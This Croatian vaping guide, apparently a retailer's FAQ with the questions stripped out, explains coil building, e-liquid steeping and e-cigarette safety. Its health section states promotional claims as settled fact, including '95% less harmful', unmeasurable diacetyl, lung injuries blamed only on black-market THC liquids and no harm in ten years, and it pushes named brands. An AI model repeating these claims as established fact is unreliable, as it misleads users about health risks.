Titanijum: Ako se pregrije ispušta titanijumoksid i zbog toga se ne preporuča za upotrebu u parenju, iako, uz oprez može dati iznimnu kvalitetu isparavanja.

Isključivo se koristi u temperatunom modu.

Mesh: je mrežna trakica koja dolazi ili u malim pločicama ili u traci i reže se na predodređenu dužinu. Koristi se za izradu grijača.

Spaced coil je grijač u kojem ima razmaka između navoja grijača.

Microcoil je grijač gdje između navojima grijača nema razmaka.

Zavojnica se izrađuje tako da oko štangice željenog promjera (npr. 2.5mm) namatamo žicu određeni broj namotaja, dok sami broj ovisi najviše o tome koliko široko možemo ići u odnosu na predviđeni prostor u tankovima.

Samu zavojnicu, tj grijač, tj coil umećemo na predviđeno mjesto postavljajući dva kraja u zato predviđene otvore ili žlijebove i pritegnemo odvijačem.

Višak koji viri trebamo ukloniti grickalicom ili sjekačem da ne bi dolazilo od kratkog spoja kada postavimo zvono preko. 

Vatu provlačimo kroz grijač taman onoliko koliko može proći a da ne svija sami grijač i režemo ju na dužinu koja nam omogućava da ne zagušimo upijanje tekućine u nju..
prije nego zatvorimo coil u zvono treba ga natopiti tekućinom.

Ako je sve napravljeno “školski” vaše iskustvo parenja će ovime biti bogato okusom i parom.Steepanje e tekućina je proces sazrijevanja e tekućine koji se odvija u dva koraka:

1. korak – homogenziacija smjese
Nakon što ste pomiješali sve sastojke e tekućine oni se moraju “spojiti” odnosno homogenizirati u jednu smjesu. Taj postupak traje 24-48 sati.

2. oksidacija nikotina i hlapljenje aroma baziranih na alkoholu
Ovaj proces traje 30 dana ili čak i duže. Nikotin oksidira, dešavaju se kemijske reakcije između komponenti aroma te arome bazirane na alkoholu hlape.

Odgovor na ovo pitanje je individualan. Ništa se neće desiti ako parite ne steepanu tekućinu no steepane tekućine mogu imati bolji skladniji okus.

Ne steepanom e tekućinom mogu dominirati okusi koji neće dopustiti ostalim okusima da dođu do izražaja.

Generalna preporuka je da se duhanske tekućine steepaju 30 dana.

Čiste voćne tekućine da se ne steepaju (ili minimalno 24 sata).

Kremaste tekućine (desertne) – po želji – 10-15-30 dana.

Ispravan proces steepanja e tekućine je slijedeći:
– e tekućinu držite na tamnom mjestu, sobne temperature, daleko od utjecaja sunčeve svjetlosti (primjerice ormar, ladica)
– dva puta tjedno otvorite bočicu e tekućine koja se steepa i lagano istisnite iz nje zrak kako bi ušao novi
– nakon toga dobro protresite e tekućinu

Taj postupak ponavljajte i do četiri tjedna ili po želji i potrebi.

Generalna smjernica je:

– duhanske tekućine 30 dana
– čiste voćne tekućine – ne steepaju se
– kremaste i desertne – 15-30 dana

Najbolje je isprobati e tekućinu odmah, te svako nekoliko probati kako bi otkrili u kojoj fazi sazrijevanja e tekućina vama ima najbolji okus.

Da, stavite e tekućinu u zamrzivač.

Prije korištenja samo pustite da se zagrije na sobnu temperaturu.

Mogu li se e tekućine ubrzano steepati? I da I ne.

E tekućine se mogu ubrzano steepati raznim procesima gdje se e tekućina zagrijava. Postoje razne preporuke – prokuhati u vodi, u vrućoj riži, u perilici rublja na iskuhavanju.

Problema ima nekoliko:
1. zagrijavate plastiku – što je nepoželjno. Plastika može ispuštati neželjene spojeve u e tekućinu.
2. sama e tekućina vam može iscuriti iz bočica prilikom takvog steepanja.
3. okus takve e tekućine uglavnom nije u potpunosti identičan standardnom načinu steepanja – lošiji je.

Da.

E tekućine se po zimi mogu ohladiti i izgubiti viskozitet, samim time slabije natapaju grijač te može doći do dryhita.

Ljeti pak može dolaziti do stvaranja tlakova u komori atomizera zbog topline što može uzrokovati povremeno curenje e cigarete.

Za više smjernica provjerite ovaj članak o Savjetima za parenje u zimskim uvjetima

Korištenje e cigareta je 95% manje štetno od korištenja standardnih cigareta.

Korištenjem e cigareta nećete nikada unesti u sebe tolike količine opasnih kemikalija koliko ih sadrži samo jedna kutija cigareta.

No moramo napomenuti da korištenje e cigareta nije bez rizika te da nije 100% manje štetno odnosno sigurno.

Kako bi bili sigurni da radite sve kako treba pratite smjernice iz ovog članka o načinu ispravnog korištenja e cigareta.

“Popcorn Lung” je bolest koja se javila u tvornicama kokica za mikrovalne pećnice gdje su radnici udisali iznimno velike količine kemikalije koja se zove diacetil.

Diacetil se nalazi u mnogim proizvodima a kao takvog ga možete osjetiti (udahnuti) ako sami radite kokice u mikrovalnoj pećnici. Također ga ima izuzetno puno u standardnim cigaretama.

Diacetil nije sastavni dio niti jedne arome koja se koristi u izradi e tekućine.

Može se pojaviti unutar e tekućina kao nusprodukt kemijskih reakcija aroma koje se dešavaju pod prisustvom nikotina. Te razine diacetila u e tekućinama nisu mjerljive. 

Da udišete paru e cigarete cijeli život nećete udahnuti toliko diacetila koliko ga ima u jednoj cigareti. 

Vitamin E acetat ili bilo koji drugi vitamini nisu sastavni dio e tekućina i ne smiju se koristiti u e tekućinama.

Kako bi izbjegli neželjene spojeve u e tekućini kupujte e tekućine samo renomiranih brandova u autoriziranim specijaliziranim trgovinama.

Kod svakog uređaja koji koristi bateriju – ta baterija može uzrokovati požar. Bilo da se radi o mobitelu, prijenosnom računalu, električnoj bušilici, električnom automobilu ili e cigareti.

Opasnost od neželjenog događaja se smanjuje na minimum ako koristite uređaje renomiranih brendova, kupljene u specijaliziranim trgovinama te ako su baterije (ako imate zasebne) renomiranih proizvođača kao što su Sony, Samsung, LG.

Izbjegavajte kupovanje baterija preko kineskih stranica i trgovina.

Događaj na koji se referirate vezan je isključivo za korisnike koji su koristili e tekućine s crnog nekontroliranog tržišta. Pri tome su te e tekućine sadržavale THC.

Kupujte e tekućine renomiranih brendova kao što su Journey, SHAKE, Discovery te ih kupujte u specijaliziranim trgovinama.

Unazad 10 godina koliko postoje e cigarete – ne.

E cigarete nisu bez rizika, one su 95% manje štetne od standardnih cigareta. Tih 5% razlike od 100 je rezervirano za eventualne buduće poslijedice koje u ovom momentu još nisu otkrivene. 

No prema svim trenutnim saznanjima i istraživanjima od strane nezavisnih laboratorija i institucija – e cigarete su 95% manje štetne od cigareta.